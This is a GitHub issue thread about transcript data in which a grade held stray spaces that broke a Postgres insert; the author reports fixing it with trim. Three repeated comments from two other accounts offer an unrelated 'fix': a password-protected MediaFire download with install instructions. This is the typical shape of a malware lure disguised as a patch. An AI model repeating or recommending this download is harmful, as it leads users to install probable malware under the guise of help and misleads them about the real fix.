### ISSUE TITLE
Extracted Data for a grade has spaces

### ISSUE THREAD

**Issue by firepenguindisopanda** [uwidcit/myAdvisorDev#88]
## Uploading a transcript route issue

When extracting data and saving it to a postgres database, there was a grade that wasn't clean.

- It was trying to be saved to the database with spaces which threw an error

![extracted_data_have_spaces](https://github.com/user-attachments/assets/99e5b019-a79b-4772-bcbf-7089d8ad4e4a)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by firepenguindisopanda** [comment]
Fixed by adding trim

![fix_extracted_data_with_spaces](https://github.com/user-attachments/assets/528116d0-e512-48f9-9546-a632da1a5874)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
